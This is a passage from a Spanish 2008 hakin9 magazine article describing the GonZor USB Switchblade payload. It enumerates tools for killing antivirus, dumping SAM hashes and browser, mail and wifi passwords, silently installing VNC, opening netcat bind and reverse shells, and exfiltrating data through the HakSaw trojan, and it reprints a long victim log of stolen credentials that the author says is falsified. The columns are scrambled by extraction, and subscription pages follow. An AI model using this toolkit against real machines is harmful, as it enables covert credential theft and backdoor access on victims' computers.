Figura 6. Configurador de GonZor
payload
mientas; yo, simplemente voy a pasar
a enumerarlas todas:
• go.cmd
Es el batch o script de arranque
y control de todas las
herramientas. Para modificarlo
hay que entender algo
o bastante de archivos de
proceso por lotes de DOS.
También hay versiones que
incorporan este script en
VBA o compilándolo de BAT
o CMD a EXE con utilidades
como bat2exec, ya que los
BAT o VBA son muy detectables
por los antivirus.
• Alternative Loader
Hay cargadores alternativos al
incluido en U3. Depende de si
el pendrive es compatible U3
o no, se utilizarán diferentes
cargadores con diferentes características.
• Nircommand
Muy buena utilidad para ejecutar
comandos en una ventana
oculta de DOS o CMD.exe sin
Figura 7. Universal U3 Cusmizer
que se vean en Windows ni la
ventana ni la referencia a ella
en la barra de tareas.
• AV Killer 1.2 BETA
Es una herramienta que lucha
con el tiempo cada vez que se
actualiza y que no suele durar
semanas ya que los antivirus la
detectan enseguida. Su finalidad
es la de detener al antivirus
instalado en el PC que la ejecuta
y ha tenido éxito con casi
todos los antivirus durante un
corto periodo. En las payloads
se la renombra como crss.exe
para evitar sospechas, pero
aun así no suele funcionar.
• Captura de IP pública tras Gateway
GonZor utiliza un script muy
simple para averiguar la IP pública
del sistema víctima. Esta
herramienta precisa de una
página web con un pequeño
archivo CGI copiado a ella que
averigua la IP y la devuelve.
• Arming/Disarming the drive
Es un script para desactivar
el modo autorun del equipo
donde se ejecuta, para protegernos
en casa de nuestra
propia arma, o volver a activarlo.
• Switchblade Kill Switch
En GonZor hay una pestaña
en el configurador para
hacer lo mismo, pero de
manera que desarmamos el
pendrive hasta que lo vuelva
a armar.
• System Info
Es una parte del script muy
sencilla, pero necesaria, que
vuelca las principales variables
del sistema en Windows hacia
nuestro log en el pendrive.
Utiliza las variables: %computername%
, %username% ,
%date% , %time% ... Además
de usar ipconfig para mostrar la
configuración de red.
• Dump SAM
Extrae los hashes MD5 de
contraseñas de usuarios
mediante PWDump. No siempre
funciona, pero cuando lo
hace... Nos llevamos unos
74 www.hakin9.org/es
maravillosos hashes para
crackearlos con tiempo y paciencia.
• Product Key
Nos da los códigos de serie
de productos de Microsoft
como Windows, Office y
otros. Capturamos números
de serie funcionales.
• Internet Explorer Password
Grabber
Una buena herramienta para
sacar las password que muchos
usuarios incautos introducen
en Internet Explorer
cuando acceden a páginas
con sistemas flojos de protección.
Funciona incluso con
IE7.
• Windows Update Lister
Otra herramienta interesante
para planificar un ataque con
tiempo y organización. Nos
muestra los updates instalados
en el PC con Windows.
De esa manera podemos
hallar las vulnerabilidades
existentes en esa máquina y
buscar los exploits adecuados
para un buen ataque.
• Network Password Dumper
Utilidad para el volcado de
passwords grabadas en cache,
como por ejemplo las
del autologon de Windows,
Sobre el Autor
Yago F. Hansen cuenta con máster
en ingeniería de software, además de
contar con más de 8 años de experiencia
en tecnologías inalámbricas. Es
especialista en la implementación y auditoría
de redes wifi. Cuenta con amplia
experiencias en motores de datos, sistemas
Microsoft, Linux y Networking.
Es formador y consultor en seguridad
informática y métodos de penetración
en redes wifi para empresas e instituciones.
Finalista en el concurso IBM
Leonardo DaVinci 1995, cuenta con
publicaciones y artículos de informática,
además de ser colaborador directo
y revisor de publicaciones técnicas de
la editorial Rama. Ha impartido diferentes
talleres y seminarios de hacking
ético y seguridad en wifi para empresas
y en universidades.

Listado 1. Captura de log de GonZor switchblade
Archivo: RAD-SRV-01-[20070927-105119]
----------------------------------------------------------
-------------------------------------------------------------------
GonZors Payload [Time Started: 27/09/2007 10:51:21,90]
----------------------------------------------------------
-------------------------------------------------------------------
Computer Name is: RAD-SRV-01 and the Logged on User Is:
Administrador
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [System info] +
+----------------------------------+
Configuración IP de Windows
Nombre del host . . . . . . . : rad-srv-01
Sufijo DNS principal . . . . : discretisimo.com
Tipo de nodo. . . . . . . . . : híbrido
Enrutamiento habilitado . . . : No
Proxy WINS habilitado . . . . : No
Adaptador Ethernet Conexión de área local:
Sufijo conexión específica DNS:
Descripción . . . . . . . . . : Broadcom NetXtreme
Gigabit Ethernet
Dirección física. . . . . . . : 00-1A-A0-0F-F7-07
DHCP habilitado . . . . . . . : No
Dirección IP. . . . . . . . . : 192.168.1.1
Máscara de subred . . . . . . : 255.255.255.0
Puerta de enlace predet.. . . : 192.168.1.199
Servidores DNS. . . . . . . . : 80.58.0.30
80.58.32.33
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [External IP] +
+----------------------------------+
External IP dumped
80.x.x.x
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [VNC] +
+----------------------------------+
VNC was installed silently
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [HakSaw] +
+----------------------------------+
HakSaw was installed silently
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [Dump Wifi Hex] +
+----------------------------------+
==================================================
Network Name (SSID): WLAN_16
Key Type : WEP
Key (Hex) : 5a303031333439383133453136
Key (Ascii) : Z001349813E16
Adapter Name : IEEE 802.11 Wireless LAN/PC Card(5V)
Adapter Guid : {7A2E64AD-321E-4ED3-8512-29C4604EB0C8}
==================================================
www.hakin9.org/es
USB Payload
==================================================
Network Name (SSID): SOPWIFI96
Key Type : WEP
Key (Hex) : 0a0b0c0d0e0f0a0b0c0d0e0f0a
Key (Ascii) :
Adapter Name : IEEE 802.11 Wireless LAN/PC Card(5V)
Adapter Guid : {7A2E64AD-321E-4ED3-8512-29C4604EB0C8}
==================================================
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [Dump SAM PWDUMP] +
+----------------------------------+
Using pipe {4A29FB50-9610-4A7A-90EB-3E66D9C00EA1}
Key length is 16
Administrador:500:4BA24AA3FE36C933F7E62F36F8DB5AE6:900677E
C06068E3D2D5352D5A8879993:::
Invitado:501:NO PASSWORD*********************:NO PASSWORD*
********************:::
SUPPORT_388945a0:1001:NO PASSWORD*********************:
65BE3920B03364762DC69B7E53A57058:::
Completed.
pwdump6 Version 1.5.0-BETA by fizzgig and the mighty group
at foofus.net
** THIS IS A BETA VERSION! YOU HAVE BEEN WARNED. **
Copyright 2006 foofus.net
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [Dump SAM FGDUMP] +
+----------------------------------+
Starting dump on 127.0.0.1
** Beginning local dump **
OS (127.0.0.1): Microsoft Windows 2003 Server (Build 3790)
Passwords dumped successfully
-----Summary-----
Failed servers:
NONE
Successful servers:
127.0.0.1
Total failed: 0
Total successful: 1
-----Hashes-----
Administrador:500:4BA24AA3FE36C933F7E53136F8DB5AE6:900677E
C06068E3D2D5352D5A8885553:::
Invitado:501:NO PASSWORD*********************:NO PASSWORD*
********************:::
SUPPORT_388945a0:1001:NO PASSWORD*********************:
65BE3920B03364762DC69B7E53A57058:::
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [Dump Network PW] +
+----------------------------------+
==================================================
Item Name : Microsoft_WinInet_192.168.1.200:80/DD-
WRT
Type : Generic
User : neinting
75

kit
Listado 1. Captura de log de GonZor switchblade
(Continuación)
Password : HOCCHULLLE
Last Written : 09/12/2007 8:51:12
Alias :
Comment :
Persist : Enterprise
==================================================
==================================================
Item Name : Passport.Net\*
Type : .NET Passport
User : nifnicknaounte@hotmail.com
Password : WONONMOIK
Last Written : 21/04/2006 18:55:59
Alias :
Comment :
Persist : Enterprise
==================================================
----------------------------------------------------------
+----------------------------------+
+ [Dump Mail PW] +
+----------------------------------+
==================================================
Name : Yago Fdez. Hansen
Application : Outlook Express
Email : wountry@soportec.com
Server : pop.soportec.com
Type : POP3
User : strange@soportec.com
Password : abracadabra
Profile :
==================================================
==================================================
Name : Yago Fdez. Hansen
Application : Outlook Express
Email : wountry@soportec.com
Server : stp.soportec.com
Type : SMTP
User :
Password :
Profile :
==================================================
==================================================
Name : Yago Fdez. Hansen
Application : MS Outlook
Email : wountry@soportec.com
Server : pop.soportec.com
Type : POP3
User : strange@soportec.com
Password :
Profile :
==================================================
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [Dump Firefox PW] +
+----------------------------------+
Error : Firefox profile directory is not specified
FirePassword (Ver 2.0.1) : Firefox Username & Password
List Decryptor
by Nagareshwar Y Talekar
For latest version visit http://www.securityxploded.com.
Usage :
76 www.hakin9.org/es
.\FirePassword.exe [-m "master password" ] [Firefox_
Profile_Directory]
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [Dump IE PW] +
+----------------------------------+
==================================================
Entry Name : tools.cisco.com:443/CCO WWChannels-
UNIFY [22:57:20:122]
Type : Password-Protected Web Site
Stored In : Protected Storage
User Name : naintingoungyinghow
Password : hereitis
==================================================
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [Dump messenger PW] +
+----------------------------------+
==================================================
Software : MSN Messenger
Protocol : MSN Messenger
User : howareningitina@hotmail.com
Password : 978fadsf865
==================================================
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [Dump Cache] +
+----------------------------------+
ERROR Failed to open key SECURITY\Cache in RegOpenKeyEx.
Is service running as SYSTEM ? Do
you ever log on domain ? (code 0)
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [Dump LSA secrets] +
+----------------------------------+
==================================================
Resource Name : IdentitiesPass
Resource Type : Outlook Express Identity
User Name/Value : Identidad principal
Password :
==================================================
==================================================
Resource Name : pop3.terra.esE83E9EC0
Resource Type : Obsolete Outlook Account
User Name/Value :
Password : adfadoieg
==================================================
==================================================
Resource Name : 192.168.0.102:80/Camara inalambrica
Soportec.com
Resource Type : IE: Password-Protected Sites
User Name/Value : demo
Password : demo
==================================================
==================================================
Resource Name : ftp://ftp.sopear@ftp.soportec.com

Listado 1. Captura de log de GonZor switchblade
(Continuación)
Resource Type : IE: Password-Protected Sites
User Name/Value : ftp.sopear
Password : NAD986Jad
==================================================
==================================================
Resource Name : y_name
Resource Type : AutoComplete Fields
User Name/Value : Yago Hansen
Password :
==================================================
==================================================
Resource Name : y_phone
Resource Type : AutoComplete Fields
User Name/Value : +3467345575355
Password :
==================================================
----------------------------------------------------------
+----------------------------------+
+ [Dump Product Keys] +
+----------------------------------+
==================================================
Product Name : Microsoft Windows Server 2003
Product ID : 69893-012-0032322345-34342
Product Key : E5RR3453-4EREBJH3-9R3345M-4V3439Q-
K43M8M
Computer Name : RAD-SRV-01
==================================================
==================================================
Product Name : Internet Explorer
Product ID : 69893-01R3-00003ERE-423ADF5
Product Key : M6RJ9-TBJHER-9DRERM-4VZVQ-KZVZM
Computer Name : RAD-SRV-01
==================================================
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [Dump URL History] +
+----------------------------------+
Páginas visitadas en la semana que empez¢ el 17/09/2007
Páginas visitadas en www.totse.com
Páginas visitadas en 192.168.1.200
Páginas visitadas en hostap.epitest.fi
Páginas visitadas en www.redsofts.com
Páginas visitadas en www.google.es
Páginas visitadas en packetstormsecurity.org
Páginas visitadas en www.rsa.com
Páginas visitadas en www.dd-wrt.org
Páginas visitadas en www.laperlaonline.com.ar
Páginas visitadas en www.soportec.com
Páginas visitadas en www.google.com
Páginas visitadas en wiki.ethereal.com
Páginas visitadas en www.cisco.com
Páginas visitadas en www.bvsystems.com
Páginas visitadas en Mi PC
Páginas visitadas en 192.168.1.201
Páginas visitadas en www.l0t3k.org
Páginas visitadas en bytes2000.wordpress.com
Páginas visitadas en en.wikipedia.org
Páginas visitadas en 192.168.1.250
Páginas visitadas en sourceforge.net
----------------------------------------------------------
www.hakin9.org/es
----------------------
Páginas visitadas hoy
USB Payload
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [Dump Updates-List] +
+----------------------------------+
==================================================
Name : ie7beta1
Description :
Installed By : Supervisor
Installation Date : 17/03/2007
Display Version : 20050725.101101
Update Type : Update
Operating System : Windows XP
Web Link : http://support.microsoft.com/
?kbid=ie7beta1
Uninstall Command : C:\WINDOWS\$NtUninstallie7beta1$\
spuninst\spuninst.exe
==================================================
==================================================
Name : KB893803
Description : Windows Installer 3.1 (KB893803)
Installed By : Supervisor
Installation Date : 08/09/2007
Display Version : 3.1
Update Type : Update
Operating System : Windows XP
Web Link : http://support.microsoft.com/
?kbid=893803
Uninstall Command : C:\WINDOWS\$MSI31Uninstall_KB893803$\
spuninst\spuninst.exe
==================================================
----------------------------------------------------------
-------------------------------------------------------------------
+----------------------------------+
+ [Network Services] +
+----------------------------------+
Conexiones activas
Proto Direcci¢n local Direcci¢n remota
Estado PID
TCP 0.0.0.0:135 0.0.0.0:0
LISTENING 956
c:\windows\system32\WS2_32.dll
C:\WINDOWS\system32\RPCRT4.dll
c:\windows\system32\rpcss.dll
C:\WINDOWS\system32\svchost.exe
-- componentes desconocidos --
[svchost.exe]
TCP 0.0.0.0:445 0.0.0.0:0
LISTENING 4
[Sistema]
TCP 127.0.0.1:5354 0.0.0.0:0
LISTENING 1472
[mDNSResponder.exe]
TCP 192.168.1.201:139 0.0.0.0:0
LISTENING 4
[Sistema]
77

kit
Listado 1. Captura de log de GonZor switchblade
(Continuación)
TCP 127.0.0.1:2288 127.0.0.1:445
TIME_WAIT 0
TCP 127.0.0.1:30606 127.0.0.1:2286
TIME_WAIT 0
UDP 0.0.0.0:1027 *:*
1304
[spoolsv.exe]
UDP 0.0.0.0:1035 *:*
1080
C:\WINDOWS\system32\mswsock.dll
C:\WINDOWS\system32\RPCRT4.dll
[svchost.exe]
UDP 127.0.0.1:1900 *:*
1136
c:\windows\system32\WS2_32.dll
c:\windows\system32\ssdpsrv.dll
C:\WINDOWS\system32\ADVAPI32.dll
C:\WINDOWS\system32\kernel32.dll
[svchost.exe]
UDP 192.168.1.201:5353 *:*
1472
[mDNSResponder.exe]
----------------------------------------------------------
+----------------------------------+
+ [Port Scan] +
+----------------------------------+
Creating log file called G:\System\Logs\RAD-SRV-01\RAD-SRV-
01_TEMP.log
Processing local system's ports...
TCP/UDP Port to Process Mappings
35 mappings found
PID Port Local IP State Remote IP:Port
4 TCP 445 0.0.0.0 LISTENING 0.0.0.0:
43026
4 TCP 445 127.0.0.1 ESTABLISHED 127.0.0.1:
1039
4 TCP 1039 127.0.0.1 ESTABLISHED 127.0.0.1:445
4 TCP 139 192.168.1.1 LISTENING 0.0.0.0:
2144
4 UDP 445 0.0.0.0 *:*
4 UDP 137 192.168.1.1 *:*
4 UDP 138 192.168.1.1 *:*
556 TCP 1025 0.0.0.0 LISTENING 0.0.0.0:43045
556 UDP 500 0.0.0.0 *:*
556 UDP 4500 0.0.0.0 *:*
740 TCP 135 0.0.0.0 LISTENING 0.0.0.0:
10429
740 TCP 135 192.168.1.1 ESTABLISHED
192.168.1.1:1033
948 UDP 1027 0.0.0.0 *:*
1008 TCP 1026 0.0.0.0 LISTENING 0.0.0.0:
59528
1008 UDP 123 127.0.0.1 *:*
1008 UDP 123 192.168.1.1 *:*
1276 TCP 1035 192.168.1.1 ESTABLISHED
66.249.93.104:80
1476 TCP 1033 192.168.1.1 ESTABLISHED
192.168.1.1:135
78 www.hakin9.org/es
1516 TCP 1812 0.0.0.0 LISTENING 0.0.0.0:
2261
1516 TCP 1813 0.0.0.0 LISTENING 0.0.0.0:
61635
1516 UDP 28000 0.0.0.0 *:*
1516 UDP 28001 0.0.0.0 *:*
1516 UDP 1645 192.168.1.1 *:*
1516 UDP 1646 192.168.1.1 *:*
1516 UDP 1812 192.168.1.1 *:*
1516 UDP 1813 192.168.1.1 *:*
1516 UDP 28007 192.168.1.1 *:*
1828 TCP 5900 0.0.0.0 LISTENING 0.0.0.0:
10296
Port Statistics
TCP mappings: 13
UDP mappings: 22
TCP ports in a LISTENING state: 8 = 61.54%
TCP ports in a ESTABLISHED state: 5 = 38.46%
Port and Module Information by Process
Note: restrictions applied to some processes may
prevent PortQry from accessing more information
For best results run PortQry in the context of
the local administrator
======================================================
Process ID: 4 (System)
System Process
PID Port Local IP State Remote IP:Port
4 TCP 445 0.0.0.0 LISTENING 0.0.0.0:
43026
4 TCP 445 127.0.0.1 ESTABLISHED 127.0.0.1:1039
4 TCP 1039 127.0.0.1 ESTABLISHED 127.0.0.1:445
4 TCP 139 192.168.1.1 LISTENING 0.0.0.0:
2144
4 UDP 445 0.0.0.0 *:*
4 UDP 137 192.168.1.1 *:*
4 UDP 138 192.168.1.1 *:*
======================================================
Process ID: 1436
Service Name: RemoteRegistry
Display Name: Registro remoto
Service Type: shares a process with other services
======================================================
Process ID: 1516 (radius.exe)
Service Name: Steel-Belted Radius
Display Name: Steel-Belted Radius
Service Type: runs in its own process
PID Port Local IP State Remote IP:Port
1516 TCP 1812 0.0.0.0 LISTENING 0.0.0.0:2261
1516 TCP 1813 0.0.0.0 LISTENING 0.0.0.0:
61635
1516 UDP 28000 0.0.0.0 *:*
1516 UDP 28001 0.0.0.0 *:*
1516 UDP 1645 192.168.1.1 *:*
1516 UDP 1646 192.168.1.1 *:*
1516 UDP 1812 192.168.1.1 *:*
1516 UDP 1813 192.168.1.1 *:*
1516 UDP 28000 192.168.1.1 *:*
1516 UDP 28001 192.168.1.1 *:*

Referencias
• Todas las distribuciones Switchblade por hak5.org.
http://wiki.hak5.org/wiki/USB_Switchblade
• La web de GonZor.
http://www.users.on.net/~simmo_89/switchblade/about.html
• Hak5 foros muy interesantes.
http://forums.hak5.org/index.php/topic,6608.180.htm
http://anvirtuel.googlepages.com/
• USB Hacks Website
http://www.usbhacks.com
• U3 project home.
http://www.u3.com
• U3 central de software
http://software.u3.com/softwarecentral.aspx
• Alternativa MojoPac a U3 con versión libre y de pago
http://www.mojopac.com
cuando se tiene activada la
función de entrar en el equipo
sin introducir el password.
• Cachedump
Otro dump de cache de usuarios
y contraseñas para do-
Listado 1. Captura de log de GonZor switchblade
(Continuación)
1516 UDP 28002 192.168.1.1 *:*
1516 UDP 28003 192.168.1.1 *:*
1516 UDP 28004 192.168.1.1 *:*
1516 UDP 28005 192.168.1.1 *:*
1516 UDP 28006 192.168.1.1 *:*
1516 UDP 28007 192.168.1.1 *:*
======================================================
Process ID: 1612 (uvnc_service.exe)
Service Name: Uvnc_service
Display Name: Uvnc_service
======================================================
Process ID: 1828 (winvnc.exe)
Process doesn't appear to be a service
PID Port Local IP State Remote IP:Port
1828 TCP 5900 0.0.0.0 LISTENING 0.0.0.0:10296
======================================================
Process ID: 2700 (cmd.exe)
Process doesn't appear to be a service
======================================================
Process ID: 3056 (LaunchPad.exe)
Process doesn't appear to be a service
======================================================
Process ID: 3264 (winvnc.exe)
Service Name: WinVNC
Display Name: Domain Client Service
======================================================
Process ID: 1516 (radius.exe)
Service Name: Steel-Belted Radius
minios de Windows. Vuelca
los diez últimos logins de ese
equipo en el dominio.
• Netstat
El conocido netstat.exe que
da las conexiones TCP y UDP
www.hakin9.org/es
Display Name: Steel-Belted Radius
Service Type: runs in its own process
USB Payload
abiertas, activas y en escucha
de la víctima. También es muy
útil para un ataque planificado.
• Port Scan
Casi un netstat.exe pero
utilizando la herramienta
PortQryV2. El log es formateado
de otra manera más
cómoda.
• Messenger password Dumper
Funciona en versiones anteriores
de Messenger, pero sin
protección de contraseñas Live.
Saca algunas contraseñas
de Messenger.
• IE History Viewer
¿Qué páginas ha visitado
este usuario? Porno, hacking,
bancos... Muy práctico.
• FireFox Password Stealer
Otro ladrón de contraseñas de
explorador de Internet, pero en
este caso de Mozilla Firefox.
PID Port Local IP State Remote IP:Port
1516 TCP 1812 0.0.0.0 LISTENING 0.0.0.0:2261
1516 TCP 1813 0.0.0.0 LISTENING 0.0.0.0:
61635
1516 UDP 28000 0.0.0.0 *:*
1516 UDP 28001 0.0.0.0 *:*
1516 UDP 1645 192.168.1.1 *:*
1516 UDP 1646 192.168.1.1 *:*
1516 UDP 1812 192.168.1.1 *:*
1516 UDP 1813 192.168.1.1 *:*
1516 UDP 28000 192.168.1.1 *:*
1516 UDP 28001 192.168.1.1 *:*
1516 UDP 28002 192.168.1.1 *:*
1516 UDP 28003 192.168.1.1 *:*
1516 UDP 28004 192.168.1.1 *:*
1516 UDP 28005 192.168.1.1 *:*
1516 UDP 28006 192.168.1.1 *:*
1516 UDP 28007 192.168.1.1 *:*
======================================================
Process ID: 1612 (uvnc_service.exe)
Service Name: Uvnc_service
Display Name: Uvnc_service
========= end of log file =========
PortQry developed by Tim Rains
----------------------------------------------------------
-------------------------------------------------------------------
GonZors Payload [Time Finished: 27/09/2007 10:51:37,96]
----------------------------------------------------------
-------------------------------------------------------------------
79

kit
• Wireless Passwords
Funciona al dedillo si se utiliza
el Windows Wireless Zero
Configuration Service (wzcs)
que almacena los ESSID y
las claves WEP/WPA de forma
muy vulnerable.
• Dialup Password Dump
Cada vez son menos los que
utilizan el módem, pero si lo
hacen, este programa nos da
las configuraciones de cuentas
de marcado o dialup. Hace
unos años hacía estragos.
• Username adder
Después de ejecutar esta
herramienta (pwservice.exe)
habremos creado un nuevo
usuario y contraseña en este
sistema, con lo que ya tenemos
una gran puerta abierta en modo
debug para programas que
necesitan privilegios administrativos
como el pwdump.
• Editing Send.bat (and stunnel.conf)
El Haksaw envía la información
recabada mediante una cuenta
de gmail al destino solicitado.
Para conseguir que se haga
de esa manera hay que configurar
en el script las cuentas,
direcciones IP y puertos.
• Silent VNC installer (with external
IP send)
Este script instala la aplicación
de control remoto VNC de
modo invisible y sin el odiado
logo en la barra de tareas en
el puerto 5900 y 80 con el
password yougothacked.
• Reverse VNC Connection
Es una conexión inversa de
VNC hacia nuestro puerto
tras Internet 5500. De esta
manera saltamos la seguridad
del router y de algunos
cortafuegos. Se le añade un
autoarranque de este proceso,
para que cada vez que
arranque la maquina infectada
se nos conecte. Hay que
especificar nuestra IP pública
o la de un dummy.
• USB HackSaw
Este script instala el troyano
HakSaw que nos envía la
información de la victima
hacia una dirección de email
o hacia una página web. Según
cuentan, ya que no lo he
probado, instala un troyano
en la maquina víctima que
cada vez que se conecta un
pendrive en ésta, se envía su
información hacia una página
web o email.
• Internal IP Nmaper
Muy buen script que hace un
nmap de la red interna para
hallar direcciones IP activas
en esta red y enviárnoslas o
grabarlas en el log.
• Folding@Home Installer
Es uno de esos proyectos
de colaboración de computación
con grupos de utilidad
científica. Al unir la víctima al
grupo de colaboradores, en
los tiempos muertos, el equipo
de la victima ayuda a una
causa desinteresada de forma
involuntaria. La colaboración
se realiza en nombre del U3 _
Zombie group.
• Folder Popuper (to show finish)
Es una utilidad, o más bien
inutilidad que nos muestra el
log, fichero txt, generado en
todo este proceso abriendo
una ventana en primer plano
al terminar.
• NetCat Bindshell
El famoso troyano netcat
que crea un shell oculto en
el puerto 52323. Se oculta,
como muchas herramientas
anteriores usando nircmd.exe.
• NetCat Reverse Shell
El mismo netcat del proceso
anterior pero forzando una conexión
inversa hacia el equipo
remoto para evitar cortafuegos
y puertos cerrados en el
router.
• Truecrypt
Este script se utiliza para ejecutar
el payload desde un volumen
encriptado para evitar
ser detectado por el antivirus.
El proceso consiste en desactivar
la conexión a Internet,
abrir el volumen encriptado,
ejecutar el anulador de antivirus
avkill, correr todo el batch
80 www.hakin9.org/es
del payload con todas las utilidades,
desmontar el volumen
y reconectar Internet. Es una
manera muy eficaz de ocultar
las herramientas dañinas a los
antivirus.
• Automated Backup and Restore
Es un batch basado en
rar.exe para que una vez
correctamente configurado y
funcionando podamos hacer
una copia exacta del pendrive
utilizando una clave de encriptación
para evitar que el antivirus
la detecte como dañina.
Es muy útil, ya que el antivirus
suele eliminar algunas de
estas herramientas que tratamos
aquí. Con el restore.bat
podemos volver a recuperar
nuestro payload en cualquier
lugar donde estemos.
• Orient the Switchblade towards a
special computer
Es una característica del script
para dirigirlo hacia un equipo
determinado y volverlo inocuo
para cualquier otro, de esta
forma vamos únicamente contra
la victima decidida.
• Antidote
Es necesario si te infectas
o infectas a una víctima de
forma accidental. El antídoto
es diferente para Windows
XP Pro o Home. La principal
diferencia entre los dos
antídotos es la utilización
del taskill en Pro y del tskill
en Home. El taskill es mucho
más potente y para procesos
de una forma más eficiente.
Realmente lo que desactiva
es el NC (Netcat) y el servicio
VNC.
Captura de log de
GonZor switchblade
Incorporo una captura de un log
de una víctima de GonZor con la
información falsificada para no
dejar pistas importantes. Es aterrador
ver la cantidad de información
recabada. Imaginarse que pasaría
si me fuera por los cibercafés
mal configurados introduciendo el
payload.(Listado 1). l

Pedido de suscripción
Por favor, rellena este cupón y mándalo por fax: 0048 22 244 24 59 o por correo: Software-Wydawnictwo Sp. z o. o.,
Bokserska 1, 02-682 Varsovia, Polonia; e-mail: suscripcion@software.com.pl
Nombre(s) ................................................................................................... Apellido(s) ..................................................................................................
Dirección ..............................................................................................................................................................................................................................
C.P. .............................................................................................................. Población ....................................................................................................
Teléfono ..................................................................................................... Fax ...............................................................................................................
Suscripción a partir del N o ...................................................................................................................................................................................................
e-mail (para poder recibir la factura) ..................................................................................................................................................................................
o Renovación automática de la suscripción
Título
Linux+DVD (2 DVD’s)
Mensual con dos DVDs dedicado a Linux
hakin9 – ¿cómo defenderse? (1 CD)
Mensual para las personas que se interesan por la seguridad
de sistemas informáticos
hakin9 StarterKit-(1CD) + hakin9 -¿cómo defenderse? (1CD)
Linux+ StarterKit (1 DVD)
Edición especial para usuarios principiantes
hakin9 StarterKit-(1CD)
Edición especial para usuarios principientes
número de
ejemplares
al año
número de
suscripciones
a partir
del número
Precio
12 69 €
6 38 €
4+6 60 €
4 28 €
4 26 €
En total
Realizo el pago con:
□ tarjeta de crédito (EuroCard/MasterCard/Visa/American Express) n O CVC Code
Válida hasta
□ transferencia bancaria a BANCO SANTANDER CENTRAL HISPANO
Número de la cuenta bancaria: 0049-1555-11-221-0160876
IBAN: ES33 0049 1555 1122 1016 0876
código SWIFT del banco (BIC): BSCHESMM Fecha y firma obligatorias:

Próximo número
hakin9 StarterKit 2/2008
En el número siguiente,
entre otros:
VBScript
Juan Manuel Bahamonde
Un articulo sobre los viruses y gusanos (como I love you) escritos en lenguaje
VBScript.
Informe Nmap (Network Mapper)
Juan Bidini
Un informe sobre funcionamiento de herramienta disenada para exploracion
y realización de auditorías en una red de seguridad en computadoras, pero
frequentamente usada con fines delictivos.
Implantación ITIL
Manel Cantos
El 80% de los incidentes de seguridad de una organización tienen su origen
en aspectos internos,debido a errores humanos y debido a cambios incontrolados.
ALTRAN y la Universitat Autonomade Barcelona son conscientes
de ello y han comenzado a tratar la seguridad desde un punto de vista organizativo,
mediante la aplicación de ITIL, lo que ha permitido controlar todos
los procesos del Servei d’Informatica de la Universitat Autonoma de Barcelona
disminuyendo así los riesgos intrínsecos a la tan necesaria implantación
del cambio dentro de un departamento de tecnologías de la información.
Correlación de eventos de Seguridad
Esteban Maurin
Cada Organización, de acuerdo a múltiples factores como lo son: recursos
económicos, ámbito del negocio, cantidad de equipamiento computacional,
características de la información que se maneja, entre otros, configura su
Arquitectura básica de Seguridad basada físicamente en Cortafuegos y
Detectores de Intrusos (IDSs). Sin embargo, para acciones de Alerta Temprana,
neutralización y Reacción no sólo basta con la configuración descrita,
sino que resulta necesario contar con un sistema de Monitoreo de Eventos
de Seguridad, que permita tomar decisiones de una manera eficaz y eficiente.
El artículo tiene como propósito fundamental el describir las ventajas
del monitoreo de eventos de Seguridad Informática empezando con una
breve aclaración de conceptos para luego esbozar la problemática actual, y
finalmente dar a conocer las soluciones existentes en el mercado dentro de
este ámbito.
El número está a la venta desde principios de Abril de 2008.
La redacción se reserva el derecho a cambiar el contenido de la revista.